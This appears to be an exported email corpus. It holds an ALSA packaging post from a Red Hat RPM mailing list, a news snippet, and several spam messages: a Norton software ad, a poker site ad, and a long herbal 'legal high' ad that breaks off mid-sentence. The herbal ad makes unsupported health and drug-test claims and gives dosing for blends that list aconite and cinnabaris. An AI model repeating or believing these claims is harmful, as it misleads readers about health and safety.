 - Recompile the "alsa-driver" source rpm for your running kernel
   (you can install the binary package if you're using the i686 2.4.18-10)
 - Install this "alsa-driver" package
 - Install the "alsa-libs" package
 - Install the "alsa-utils" package
 Now go to this URL and find out what you need to change in your
 /etc/modules.conf file to replace the default OSS driver loading :
 http://www.alsa-project.org/alsa-doc/
 (very complete and very good documentation!)
 Hopefully you'll see that your card *is* supported ;-)
 Reboot, or remove by hand your current sound modules (you'll probably need
 to stop many applications to free the sound resource...) "by hand" and
 insert the new ones. If all is well you've got ALSA working! ("dmesg" to
 check is a good idea), you now just need to adjust the volume levels with
 e.g. aumix and alsamixer because everything is muted by default.
 With "aplay" you can already test files to see if you hear anything. You
 can also install the XMMS plugin (seems to make my XMMS segfault on exit...
 hmmm, but maybe it's another plugin) to listen to your good ol' mp3
 files... that's it!
 It really isn't complicated, and has never been from what I see. The only
 thing I disliked was to have to install from source... but as I can't
 imagine myself doing that ;-) I've repackaged everything cleanly. Even the
 /dev entries are included in the rpm package (and *not* created by an ugly
 %post script, I insist!) and seamlessly integrate into the /etc/makedev.d
 structure. There are also a few other noticeable differences with the
 default provided ALSA spec files, for example I've split alsa-lib's
 development files into an alsa-lib-devel package and included static
 libraries... there are others of course (oh yes, the kernel version against
 which the "alsa-driver" package is compiled gets neatly integrated in the
 rpm release, so does the architecture!).
 I'm open to any comments or suggestions about these packages!
 Download :
 http://ftp.freshrpms.net/pub/freshrpms/testing/alsa/
 Current spec files :
 http://freshrpms.net/builds/alsa-driver/alsa-driver.spec
 http://freshrpms.net/builds/alsa-lib/alsa-lib.spec
 http://freshrpms.net/builds/alsa-utils/alsa-utils.spec
 (All others, patches etc. : http://freshrpms.net/builds/ )
 Matthias
 PS: As an extra bonus, I've also recompiled xine with alsa support! Simply
 run "xine -A alsa09" and off you go! It may even support 5.1 and S/PDIF ;-)
 -- 
 Clean custom Red Hat Linux rpm packages : http://freshrpms.net/
 Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10
 Load : 0.57 0.42 0.42, AC on-line, battery charging: 29% (1:55)
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Attn: NORTON SYSTEMWORKS CLEARANCE SALE_ONLY $29.99!                  Y
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;meta http-equiv=3D"Content-Language" content=3D"en-us"&gt;
 &lt;meta name=3D"GENERATOR" content=3D"Microsoft FrontPage 4.0"&gt;
 &lt;meta name=3D"ProgId" content=3D"FrontPage.Editor.Document"&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Dwindows-=
 1252"&gt;
 &lt;title&gt;Norton AD&lt;/title&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;table border=3D"0" width=3D"489" height=3D"54" bgcolor=3D"#FFFFFF"&gt;
   &lt;tr&gt;
     &lt;td width=3D"100%" height=3D"48" bgcolor=3D"#FFFFFF" align=3D"center"&gt;=
 &lt;font face=3D"Impact" color=3D"#CC0000" size=3D"3"&gt;Take
       Control of Your Computer With This Top-of-the-Line Software!&lt;/font&gt;&lt;=
 /td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;table border=3D"5" cellspacing=3D"3" width=3D"489" cellpadding=3D"3" bgco=
 lor=3D"#990033"  bordercolor=3D"#FFFFFF" style=3D"border-collapse: collaps=
 e" bordercolordark=3D"#000000" height=3D"567" bordercolorlight=3D"#FFFF99"=
 &gt;
   &lt;tr&gt;
     &lt;td width=3D"467" height=3D"555" bordercolorlight=3D"#FFFFFF" borderco=
 lordark=3D"#FFFF99"&gt;
       &lt;table border=3D"6" width=3D"100%" height=3D"86" bgcolor=3D"#FFFF99"=
  bordercolor=3D"#FFFFFF"&gt;
         &lt;tr&gt;
           &lt;td width=3D"100%" height=3D"80" align=3D"center"&gt;&lt;b&gt;&lt;font color=
 =3D"#FF0000" face=3D"Tahoma" size=3D"6"&gt;Norton
             SystemWorks 2002 &lt;/font&gt;&lt;font face=3D"Tahoma" size=3D"5" color=
 =3D"#000000"&gt; Software Suite&lt;/font&gt;&lt;font color=3D"#FF0000" face=3D"Times N=
 ew Roman" size=3D"6"&gt;&lt;br&gt;
             -&lt;i&gt;Professional Edition&lt;/i&gt;-&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;table border=3D"0" width=3D"100%" height=3D"62"&gt;
         &lt;tr&gt;
           &lt;td width=3D"100%" height=3D"56" align=3D"center"&gt;&lt;b&gt;&lt;font face=3D=
 "Tahoma" color=3D"#FFFFFF" size=3D"4"&gt;Includes
             Six - &lt;/font&gt;&lt;i&gt;&lt;font face=3D"Tahoma" size=3D"4" color=3D"#FFF=
 F99"&gt;Yes 6!&lt;/font&gt;&lt;/i&gt;&lt;font face=3D"Tahoma" color=3D"#FFFFFF" size=3D"4"&gt; 
             - Feature-Packed Utilities&lt;br&gt;ALL for &lt;/font&gt;&lt;font face=3D"Tah=
 oma" size=3D"4" color=3D"#FFFF99"&gt;1&lt;/font&gt;&lt;font face=3D"Tahoma" color=3D"#=
 FFFFFF" size=3D"4"&gt;
             Special &lt;/font&gt;&lt;font face=3D"Tahoma" size=3D"4" color=3D"#FFFF=
 99"&gt;LOW&lt;/font&gt;&lt;font face=3D"Tahoma" color=3D"#FFFFFF" size=3D"4"&gt;
             Price of &lt;/font&gt;&lt;font face=3D"Tahoma" size=3D"4" color=3D"#FFF=
 F99"&gt;Only
             $29.99!&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;table border=3D"4" width=3D"100%" height=3D"135" bgcolor=3D"#800000=
 " bordercolor=3D"#FFFFFF"&gt;
         &lt;tr&gt;
           &lt;td width=3D"100%" height=3D"129" bgcolor=3D"#FFFF99" bordercolo=
 r=3D"#800000"&gt;&lt;b&gt;&lt;font face=3D"Tahoma" size=3D"2"&gt;&lt;font color=3D"#000000"&gt;=
 This
             Software Will:&lt;/font&gt;&lt;font color=3D"#FFFFFF"&gt;&lt;br&gt;&amp;nbsp;&lt;/font&gt;=
 &lt;font color=3D"#FF0000"&gt;-
             Protect your computer from unwanted and &lt;i&gt; hazardous&lt;/i&gt;  vir=
 uses&lt;br&gt;&amp;nbsp;-
             Help secure your private &amp;amp; valuable information&lt;br&gt;&amp;nbsp;-=
  Allow
             you to transfer files and send e-mails &lt;u&gt; safely&lt;/u&gt;&lt;br&gt;&amp;nbsp=
 ;-
             Backup your ALL your data quick and easily&lt;br&gt;&amp;nbsp;- Improve =
 your
             PC's performance w/&lt;i&gt;superior&lt;/i&gt;
             integral diagnostics!&lt;br&gt;&amp;nbsp;- &lt;i&gt;You'll NEVER have to take =
 your
             PC to the repair shop AGAIN!&lt;/i&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;&amp;nbsp;
       &lt;table border=3D"4" width=3D"100%" height=3D"4" bgcolor=3D"#FFFFFF" =
 bordercolor=3D"#FFFF99"&gt;
         &lt;tr&gt;
           &lt;td width=3D"100%" height=3D"1"&gt;
             &lt;p align=3D"center"&gt;&lt;b&gt;&lt;font size=3D"5" face=3D"Tahoma"&gt;&lt;font =
 color=3D"#000000"&gt;&lt;font color=3D"#ff0000"&gt;6&lt;/font&gt;
             Feature-Packed Utilities
             &lt;/font&gt;&lt;font color=3D"#000080" size=3D"5"&gt;&lt;br&gt;&lt;/font&gt;&lt;u&gt;&lt;font =
 color=3D"#ff0000"&gt;1&lt;/font&gt;&lt;font color=3D"#000000"&gt;
             Great Price&lt;/font&gt;&lt;/u&gt;&lt;font color=3D"#000000" size=3D"5"&gt; &lt;br&gt;
             A &lt;font color=3D"#ff0000"&gt;$300+&lt;/font&gt;  
             Combined Retail Value
             &lt;/font&gt;
             &lt;i&gt;&lt;font color=3D"#FF0000"&gt;YOURS&lt;/font&gt;&lt;/i&gt; &lt;font color=3D"#00=
 0000"&gt; for
             Only &lt;font color=3D"#ff0000"&gt;$29.99!&lt;/font&gt;
             &lt;/font&gt;&lt;/font&gt;&lt;font size=3D"6"&gt;&lt;br&gt;
             &lt;/font&gt;&lt;/b&gt;&lt;font face=3D"Tahoma" size=3D"4"&gt;&lt;font color=3D"#00=
 0000"&gt;&amp;lt;
             Price Includes &lt;/font&gt;&lt;font color=3D"#FF0000"&gt;FREE&lt;/font&gt;&lt;font=
  color=3D"#000080"&gt; 
             &lt;/font&gt;&lt;font color=3D"#000000"&gt;Shipping! &amp;gt;&lt;br&gt;&lt;/font&gt;&lt;/font=
 &gt;&lt;font color=3D"#FF0000" size=3D"3" face=3D"Impact"&gt;And
             For a Limited time Buy Any 2 of Our Products &amp;amp; Get 1 Free!=
 &lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
     &lt;p align=3D"Center"&gt;&lt;b&gt; &lt;font face=3D"Arial" size=3D"3" color=3D"#FFFF=
 FF"&gt;Don't fall
     prey to destructive viruses or hackers!&lt;br&gt;Protect&amp;nbsp; your computer=
  and
     your valuable information and&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
       &lt;table border=3D"4" width=3D"100%" height=3D"44" bordercolor=3D"#FFF=
 F99" bgcolor=3D"#FFFF99"&gt;
         &lt;tr&gt;
           &lt;td width=3D"100%" height=3D"38" bgcolor=3D"#FFFFFF" align=3D"ce=
 nter"&gt;&lt;b&gt;&lt;a href=3D"http://www.anythinggoeshere.com/" style=3D"color: #FF0=
 000; font-family: Verdana; font-size: 14pt; font-weight: bold"&gt;&lt;font face=3D=
 "Tahoma" size=3D"4" color=3D"#FF0000"&gt;-&amp;gt;
             CLICK HERE to Order Yours NOW! &amp;lt;-&lt;/font&gt;&lt;/a&gt;&lt;/b&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;p align=3D"Center"&gt;&lt;font color=3D"#ffffff" size=3D"1" face=3D"Tahom=
 a"&gt;Your email
       address was obtained from an opt-in list. Opt-in UEFAS (United Email
       Federation Against Spam) Approved List - &amp;nbsp;Purchase Code #
       8594030.&amp;nbsp;&amp;nbsp;If you wish to be unsubscribed from this list, p=
 lease &lt;a style=3D"COLOR: #ffffcc" href=3D"http://www.anythinggoeshere.com/=
 remove.asp"&gt;Click
       here&lt;/a&gt; . If you have previously unsubscribed and are still receivi=
 ng
       this message, you may email our &lt;a style=3D"COLOR: #ffffcc" href=3D"=
 http://www.anythinggoeshere.com/abuse.asp"&gt;Spam
       Abuse Control Center&lt;/a&gt;. We do not condone spam in any shape or for=
 m.
       Thank You kindly for your cooperation.&lt;/font&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Tough Earth bug may be from Mars
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-3,8251864,1440/
 Date: Not supplied
 A hardy microbe that can withstand huge doses of radiation is most likely to 
 have evolved this ability on the Red Planet, argue scientists
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Want to play poker with other people online.
</t>
  </si>
  <si>
    <t xml:space="preserve">Get your favorite Poker action at http://www.multiplayerpoker.net
 Play against real people from around the world for real money or just
 for fun.  Access one of the busiest poker rooms online.  We've dealt
 over 8 million hands!  Experience the best poker software available
 today featuring world class graphics, true random shuffling algorithms,
 and 24x7 customer service.  We've got a great selection of poker games
 for you to play such as:
 Hold'em, Omaha
 Omaha Hi/Lo
 7 Card Stud
 7 Card Stud Hi/Lo
 5 Card Stud
 Poker tournaments
 Sign up today and start playing with new &amp; old friends...download our free
 software now at http://www.MultiPlayerPoker.net
 Current Promotion:
    $50 Deposit Bonus! - 100% bonus!
    Daily High Hand - $250 Daily.
    Progressive Bad Beat Jackpot - $2,000.00 minimum with $100.00 added
 daily.
    Tournaments - Multiplayer shootouts.
 wish not to received any further e-mail from us please click
 http://www.centralremovalservice.com/cgi-bin/poker-remove.cgi
 (K3)8456DyGH8-805KZkP1399PLHN9-156cgkc0858xxnWl40
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Faeries
</t>
  </si>
  <si>
    <t xml:space="preserve">UNCOMMON EXOTIC PLEASURE BOTANICALS!
 Feeling marvelous, Mood-Sensitive, Mood-Enhancing, Depressive/Regressive, "Sweet Treat" forumulations for the Pleasuring and Well-Being of Body, Mind &amp; Spirit from the planet's foremost "Sensitive" ethnobotanical cooperative -- Exotic Botanical Resources! (Product descriptions, pricing and deep-discounted Intro Offers information below.)
 SEVENTH HEAVEN "SWEET TREAT" MENU 
 1. SHANGRILA ZOWIE WOWIE (tm) (Gnarly Sweet Grass).  Absolutely, the most significant legal "Personal Choice" non-cannabis, non-marijuana, non-tobacco smoking botanical on the planet.
 2. PROSAKA (tm) High-Ratio extracts in tablet form for Calm, Balance, Serenity &amp; Peaceful living.
 3. AQUEOUS KATHMANDU (tm) (Happy Drops) "Personal Choice" enhanced "Sensitivity" for non-smokers &amp; tokers.
 4. SWEET VJESTIKA (tm) (Aphrodisia Drops) Erotica; Intimacy "Sensitivity" Enhancement at its finest for men &amp; woman.
 5. GENTLE FEROCITY (tm) Viripotent Energization, Appetite Suppression Tablets without the inclusion of  Caffeine or MaHaung Herb or Ephedrine!
 6. CAPILLARIS HERBA (tm) A sedate smoking and/or brewing Happiness  Botanical. 
 ********************************
 **Shangrila Zowie Wowie (tm)**
 ********************************
 "Personal Choice" Primo Exotic Supplemental Smoking Botanical / Gnarly "SweetGrass" Variety / Supplemental Agenda "Seventh Heaven" Paradoxical Configuration for the "significant" Enhancement and Pleasuring of body, mind &amp; spirit "sensitivities" -- Potentiated; Gnarly, whole-plant Matrix  -- Paragonic Reserve; Enigmatic Blendage Mood "Sensitive / Responsive" Smoking / Brewing Herba.
 Actions &amp; indications: Simultaneous, High-Spirited; "Stimulation / Relaxation / Aphrodisia" (Significant Paradise Consequence!)
 This is the Personal Choice, Sensitive, Responsive Smoking ("Smoka") product we have wanting to offer! This is the product and the VALUE that you have been searching for. This is the product that you will buy again &amp; again!
 We have been in the business (science) of developing non-cannabis, personal choice sensitive smoking agendas for a good, goodly while. Along this avenue of ethnobotany, we have always strived to achieve greater and greater "Sensitivity / Responsiveness" &amp; Aphrodisia within our gourmet smokables and brews. And indeed, we have. Many of these previous products are still marketed today by companies who are less developmental than our botanical resource cooperative. Even our own two signature "smokables" (Ragga Dagga &amp; Stoney Mahoney) are being discontinued. That Shangrila Zowie Wowie is by far such a superior product is undeniable, therefore it makes no sense to us at all to offer any other smoking product. Quite simply we have surpassed even our own expectations of excellence, thereby; our definition of excellence has evolved. This "Shangrila" project has been in research and development for sometime on two fronts. First, on an agricultural level, fields for our Gnarly SweetGrass!
  must be planted and be allowed to propagate for several years before initial harvest can even be undertaken. This is how the botanical achieves "potent significance" much like the regimen of ginseng. Also, harvest time is limited and can take place only twice a year, as like the hemp plant, maximum potency is only achieved after "flowering" occurs. But, unlike the hemp plant, and for that matter, unlike most herbs, the entire base plant of Shangrila Zowie Wowie (leave, stem &amp; root) is all "viripotent," which makes this "gnarly stoke" a botanical phenomenon! As well, most potentiating factors of Shangrila, as well as the primary botanical factor of Shangrila, will not achieve "viripotency" if grown in our hemisphere, therefore; Shangrila is indeed a multi-national, multi-complicated, agricultural undertaking. However, all of this undertaking has indeed been worthwhile! Secondly, the potentiating, infusion regimen used to enhance the attributes of Shangrila has also taken a lon!
 g time to bring into potent fruition as there are many balancings of the various molecular factors involved in the completion of Zowie Wowie. We are most pleased to be able to say, as you will note in the experience of Shangrila Zowie Wowie, that this process has achieved fruition.
 Suffice to say, without any hype or glype, Shangrila Zowie Wowie Gnarly SweetGrass is without a doubt, the most significant, non-invasive, non-cannabis, "sensitive/responsive", personal choice, absolutely legal (cannot fail a drug test), smoking ("Smoka") botanical on our planet ... probably in the universe! Hard to believe that this product is ABSOLUTELY LEGAL!
 * Mill-stoned &amp; honed.
 * Depressive regressive!
 * Psychologically uplifting!
 * Good-bye stress, anxiety &amp; restlessness!
 * Sophisticated, well-balanced "ambiance."
 * Inspires contemplativeness and creativity.
 * "Potentiated" &amp; viripotent!
 * 4  5 draws lasts a good, goodly while.
 * Sweet aphrodisia! (Horny Goat Weed factoring)
 * Simultaneously; uplifting and relaxing!
 * Easy ignition, Smooth draw, Sweet, heady taste.
 * Easy on, easy off!
 * SATISFACTION GUARANTEED!
 * No "munchie" factor.
 * No failed drug tests!
 Shangrila Zowie Wowie (tm) Gnarly "SweetGrass" botanical is best utilized as a viri-potent "Smoka", via an herb-pipe. As is an herbalist's way, four or five draws of "Smoka" should be inhaled and retained. For the non-smoker, it is most appropriate to engage this herbaceousness as a potentiated tea/brew. (Steep approximately one teaspoon of Shangrila Zowie Wowie (tm) herba per one cup of water for ten minutes or so &amp; strain.) When smoking Shangrila Zowie Wowie (tm), please draw gently as it is a most preeminent "Sensitive / Responsive" Smoke. Both a personal water-pipe (huuka) (water-pipe is included with quarter pound can only) and a standard herb-pipe are included for your smoking convenience and delight. Smoke and Brew concurrently is absolutely a Sweet, Sensitive Treat!
 Shangrila Zowie Wowie (tm) "Sensitive/Responsive" Smoka includes and is potentiated with the following non-irradiated, Mill-Stoned &amp; Honed, exotica botanicals and botanical essences: Half-edged Lily-rare Bian Lian (lobeline factors), Kona Lactuca virosa, Yucatan Turnera aphrodisaca, Hawaiian Vervain (Maui strain), Siberian Leonorus Sibricus, rare Lotus Leaf, Jamaican Blue Verbena officinalis, Spanish Peumus Crocus Sativa, Chinese (flowering-tops only) Horny Goat Weed, Ginko Biloba, African Cola Vera, and African Wilde Dagga (flowering-tops only). Shangrila Zowie Wowie (tm) does not include any tobacco or any cannabis factors. Shangrila Zowie Wowie (tm) does indeed achieve gourmet distinction upon its own merit.
 Shangrila Zowie Wowie (tm) is not intended for use during work or while driving. Nor should it be enjoyed during pregnancy. In addition, although no factor in Shangrila Zowie Wowie (tm) is illegal or regulated, it is the ethical policy of Exotic Botanical Resources that Shangrila Zowie Wowie (tm) not be sold or offered to any person that has not attained at least 21 years of age.  All things in their time.... 
 ********************************************************
 SHANGRILA ZOWIE WOWIE PRICING:
 * One 1 oz. bag (incl. herb-pipe only) $80.00 (plus shipping)
 * One 4 oz. Q.P.C. (Quarter Pound Can) (incl. herb-pipe &amp; 
 personal brass hookah)  $150.00 (plus shipping) 
 Also included as an added BONUS with each Q.P.C. purchase is a FREE 2 oz. package of our Capillaris Herba.
 (See Intro Offers at bottom of this text for further savings)
 ******************
 **PROSAKA (tm)**
 ******************
 High-Ratio extracts in tablet form for Calm, Balance, Serenity &amp; Peaceful living.
 This Prosaka formulation, which we have just recently further potentiated, boasts an extremely loyal and abundant patronage, having been available to market at large now for a number of years. Prosaka botanical tablets were originally introduced as a botanical, supplemental alternative to various traditional medications that are prescribed for stress, anxiety, depressiveness, mood enhancement, insomnia, excessive dream activity, etc. We like to use this analogy: Imagine the circumstances of your life to be hurricane-ish. Certainly, Prosaka will not stop the wind from blowing. However, it will help to center you within the calm eye of your hurricane, so that you will better see your living and make your decisions from a calmer, more serene, more balanced perspective. Please note that when undertaking any supplemental herbal regimen in this arena, it is important to make a personal commitment to the therapy. It would make no sense to purchase Prosaka and to take it only sporadic!
 ally or only briefly. It is for this reason, although Prosaka is a very expensive formulation to produce; that we offer 300 count containers at as much of a reduced price as we are able to offer.
 Prosaka is an exclusive, proprietary amalgamation in tablet form which includes the following uncommon botanicals, extracts, flower-top essences and essential oils: Radix Salviae, Sensitive Mimosa Bark, Arillus Euphoriae, Shizandra, Frutcus Mori, Caulis Polygoni, Zizyohus, Tang Kuei, Cedar Seed, Sweetflag Rhizome, Cuscutae, Amber, Radix Scutellariae, Evodia, Longan, Arisaema, Cistanches, Radix Polygalae, Red Sage Root and Eucommia. No factor contained within Prosaka is restricted or regulated by law. All botanicals contained within are non-irradiated and are of pharmaceutical grade. 
 Suggested Usage: 1 - 2 tablets; 2 to 3 times per day as needed. Best taken on an empty stomach. (During times of intensity up to 10 tablets per day may be utilized.) 
 Also Note: Prosaka is not intended to supercede physician's care nor is it intended for use during pregnancy.
 ********************************************************
 PROSAKA PRICING:
 * One 100 count bag ... $55.00 plus shipping
 * One 300 count container ... $130.00 plus shipping
 For larger quantities, please inquire.
 (See Intro Offers at bottom of this text for further savings!)
 *******************************************
 **AQUEOUS KATHMANDU (tm) (Happy Drops)**
 *******************************************
 "Personal Choice" enhanced "Sensitivity" for non-smokers &amp; tokers.
 Aqueous Kathmandu has only been offered to market at large for a short while. However, in a short time this product has achieved a tremendous, very happy following.
 Aqueous Kathmandu (tm) "Sensitive/Responsive" Happiness Drops(Temple "Quantum" Variety). Indeed; a Happiness Brew from the Kathmandu a.k.a. "Secret Fire" from a toke-smoke point of view, if you know what I mean and be groovin' the scene. Who du the Kathmandu? Now, everybody can du the Kathmandu!  (that is, if you're 21 years of age or older) Aqueous Kathmandu is engaged to holistically inspire and instill "sensitive/responsive" happiness and mellowness without the detriment of carcinogenic inhalation (smoking). Aqueous Kathmandu is absolutely legal and does not contain any controlled, considered to be harmful or regulated herbs or cannabis/marijuana factors!
 As "smoking" has become so socially taboo over the years and as so many people have asked us for a liquid product, we have long strived to bring a quantum-factored, concentrated liquid product to fruition. This has been no easy task for a variety of botanical and technological reasons. Finally, we are able to say that this task has been accomplished. A "Sensitive" herbal/botanical awakening, if you will, as we have introduced and brought to market Aqueous Kathmandu (tm) Happiness Drops, Temple "Quantum" Variety, a.k.a. "Secret Fire."
 - NO need to smoke.  NO carcinogenic factors!
 - Absolutely Legal!  NO Prescription Required.
 - NO Failed Drug Tests!
 - NO Cannabis or any Tobacco variety.
 - Quantum-Ratio, Core-Extracted, Refined Organic Factors.
 - Marvelously Potent - REMARKABLY Substantial! 
 - Inspires Contemplativeness and Creativity!
 - Attitude and Mood Enhancement, Adjustment.
 - Interrupts Anxiety, Relaxes Stress.
 - A much superior product Better than Kava Kava, St. John's Wort, etc.
 - Many fine ganja virtues with NONE of the Negatives!
 - Better sleeping and dreaming.
 - Non-invasive - NO Downside!
 - Promotes Body, Mind and Spirit Intimacy.
 Contents: Aqueous Kathmandu is a unique botanical substantiality.  It is offered and marketed as such.  Undisputedly, it achieves "distinctive accolade" of its own merit.  Aqueous Kathmandu is absolutely legal and does not contain any controlled or regulated or harmful herbs or cannabis factors.  However, it is our mandatory ethical policy that Aqueous Kathmandu not be offered to individuals who have not yet attained at least 21 years of age (all things in their time).  Please note as well that Aqueous Kathmandu is not intended for usage during work or while driving.  And, as is true of all substance and indulgence, this product should not be enjoyed during pregnancy.  This proprietary formulation does include the following quantum-ratio, core-extracted/refined botanicals in an alcohol base as a preservative: Albizzia flower-tops, Drachsha, Chavana Prash, Lactuca Virosa, Hybrid Flowering Turnera Diffusa, Wild Dagga, Capillaris Herba, Angelica Root, Zizyphi Spinosae, Buplerum, !
 Hybrid Valeriana officinalis Root, Albizzia flower-tops, mature Polygonum Vine, Calea Zacatechichi, Crocus Sativa flower-tops, Leonorus Sibricus buds, Cinnabaris, Margarita herba, Biotae Orientalis, Salviae Miltiorrhizae.
 Usage Instructions: Shake well. Mix 30-50 drops with juice or water (best on empty stomach). Ambiance lasts about two hours or so. Not intended for use during pregnancy or while working or driving. Keep out of reach of children.
 ********************************************************
 AQUEOUS KATHMANDU PRICING:
 * One 2 oz. bottle (90+ usages)... $115.00 plus shipping
 * Two 2 oz. bottles ... $170.00 plus shipping
 (See Intro Offers at bottom of this text for further savings!)
 ********************************************
 **SWEET VJESTIKA (tm) (Aphrodisia Drops)**
 ********************************************
 Erotica, Intimacy "Sensitivity" Enhancement at its finest for men &amp; women.
 Even we did not imagine the "sweet" customer appreciation that Sweet Vjestika has enjoyed. Now, more potent than ever due to higher concentrations of Sweet Vjestika's botanical factors, this is intimacy enhancement at its finest.
 Sweet Vjestika is an erotic aphrodisia, sexual intensifier/enhancer, liquid amalgamated extract for men &amp; women.  Indeed, a HeavenSent Treasure of Pleasure to entice your Passion, to intrigue your Desire, Enchantment's Rapture, Sweet Vjestika's Fire.
 The Tantra Sacrament of Sweet Vjestika Aphrodisia Drops Extravagantly Inspires and Enhances:  
 *Sensitivity to touch 
 *Desire to touch &amp; be touched
 *Fantasy / Lust / Rapture / Uninhibitedness 
 *Erogenous sensitivity
 *Sexual courageousness 
 *Sexual gentleness and ferocity
 SWEET  VJESTIKA  APHRODISIA  DROPS
 *Prolongs and intensifies foreplay 
 *Prolongs and intensifies  orgasm / climax 
 *Inspires body, mind, spirit orgasm / climax 
 *Inspires and enhances body, mind, spirit communion betwixt lovers 
 *Inspires and enhances the enchantment / glamourie of Love
 Contents: Whole MaHuang, Bee Pollen, Epimedium Angelica, Rehmannia, Ginger, Schizandra, Polygonatum, Adenophora, Tremella, Tang Kuei, Reishi, Codonopsis, Eucommium, Lycii Berry, Ligusticum, Peony Root, Fo Ti, Atractylodes, Ophiopogon, Royal Jelly, Euryales Seeds, Poria, Licorice, Mountain Peony Bark, Cormi Fruit, Rose Hips, Prince Ginseng, Scrophularia, Alisma, Astragalus, Fennel, Buplerium, Cypera, Aconite, Polygala, Red Sage Root, Jujube Seed, Lotus Seed, Tien Chi Ginseng, Ligus Ticum, Psoralea, Dodder Seed, and Cisthanches in a solution containing 24% pure grain alcohol as a preservative, distilled water and Lecithen as an emulsifier. 
 Suggested Usage: Sweet Vjestika is extremely potent.  Use 10 - 15 drops sublingually or in juice or tea, not to exceed 25 drops.  Best when taken upon an empty stomach approx. 45 minutes before intimacy.  Based upon 25 - drop increments there are approx. 60 dosages per 1 oz. bottle.  Usage should not exceed 2 doses per week.  Persons taking any prescription medication or suffering from depression or anxiety, should consult with their health care provider before using.  This product is not intended for usage by persons with abnormal blood pressure or any cardiovascular malady or any thyroid dysfunction.  Nor is it to be used during pregnancy or by any person under 21 years of age.
 ********************************************************
 SWEET VJESTIKA PRICING:
 * One 1 oz. bottle (approx. 60 dosages) ... $90.00 plus shipping
 * Two 1 oz. bottles (approx. 120 dosages) ... $140.00 plus shipping
 (See Intro Offers at bottom of this text for further savings!)
 ***************************
 **GENTLE FEROCITY (tm)**
 ***************************
 Heaven-Sent "Viripotent" Energization, Appetite Suppression Tablets without the inclusion of  Caffeine or MaHaung Herb or Ephedrine! 
 * NO jitters.  
 * NO inability to sleep at bedtime.
 * NO strung-out feeling!
 A non-caffeine, non-ephedrine, non-ephedra, non-MaHuang; virpotent, herbaceous prescription for the dynamic energization of body, mind and spirit.
 This Gentle Ferocity Formulation is amalgamated in accordance with the fundamental Taoist herbal principle of botanical interactiveness and precursorship which in essence is a molecular equation of the relevant botanical/herbal alkaloids and glycosides interacting with one another to proliferate molecular communion and thereby to achieve demonstrative herbal efficaciousness without negative implication to any aspect of human composition. These Gentle Ferocity Cordial Tablets are incredulously and thoroughly effective. Enjoy!
 Entirely Natural!  Increases Energy!  Increases Metabolism!  Decreases Appetite!
 Contents: Each Gentle Ferocity Tablet contains 500 mg. of the following proprietary formulated, high-ratio concentrated botanical factors: Cortex Eucommiae, Radex Polygoni Multiflori, Zizyphus Seed, Fructus Schisandrae, Radix Panax Ginseng, Radix Astragali, Atractylode, Sclerotium, Porial Cocos, Saussurea Tang Kuei, Longan, Radix Paeoniae, Biota Seeds, Glehnia, Radix Salviae, Ligusticum, Lycu Berry, Radix Dioscoreae, Cortex Mouton, Frutcus Corni, Radix Polygalae, Cistanches, Radix Pseudoslellariae and Cortex Aranthopanacis. 
 Suggested Usage: 1 - 2 tablets as needed. Best taken on an empty stomach. Not to exceed 6 tablets per day.  Please Note: Persons with high blood pressure or any cardio-vascular malady should consult with their health care provider before engaging Gentle Ferocity.  Also: Gentle Ferocity is not intended for use during pregnancy nor is it intended for acquisition by any person who has not attained at least 18 years of age.
 ********************************************************
 GENTLE FEROCITY TABLETS PRICING:
 * One 300 count jar ... $130.00 plus shipping
 * Two 300 count jars .. for $220.00 plus shipping (reg. $260, save $40)
 * Three 300 count jars .. for $290.00 plus shipping (reg. $390, save $100)
 (See Intro Offers at bottom of this text for further savings!)
 ***************************
 **CAPILLARIS HERBA (tm)**
 ***************************
 A Sedate Smoking or Brewing Happiness Botanical.
 Capillaris Loose-leaf Herba is a very calming, happy sort of smoking/brewing herba. Capillaris Herba is a singular botanical and is best utilized close to bedtime as it is a very sedate herba. Not as potent as Shangrila Zowie Wowie from a smoking perspective (no legal product is), but well worth your attention! Many folks find that if they partake of both smoke and brew that not only do they go to sleep very happily, but that their dreaming life is often nicely enhanced.
 Capillaris Herba botanical is best rolled or bowled when engaged as a "Smoka." As is an herbalist's way, four or five draws of "Smoka" should be inhaled and retained. For the non-smoker, it is most appropriate to engage Capillaris Herba as a most peaceful brew/tea. (Steep approximately one teaspoon of Capillaris Herba per one cup of water for ten minutes or so &amp; strain.) 
 Capillaris Herba is not intended for use during work or while driving. Nor should it be enjoyed during pregnancy. In addition, although no factor in Capillaris Herba is illegal or regulated, it is the ethical policy of Exotic Botanical Resources that Capillaris Herba not be sold or offered to any person that has not attained at least 21 years of age.  All things in their time.
 ********************************************************
 CAPILLARIS HERBA PRICING:
 * One 2 oz. bag ... $65.00 plus shipping
 * Two 2 oz. bags ... $100.00 plus shipping
 (See Intro Offers at bottom of this text for further savings!)
 ********************************************************
 "CUSTOMER APPRECIATION" INTRODUCTORY OFFERS 
 All intro offers include a FREE 2 oz. package of our Capillaris Herba (regularly $65.00).
 PLEASE NOTE:
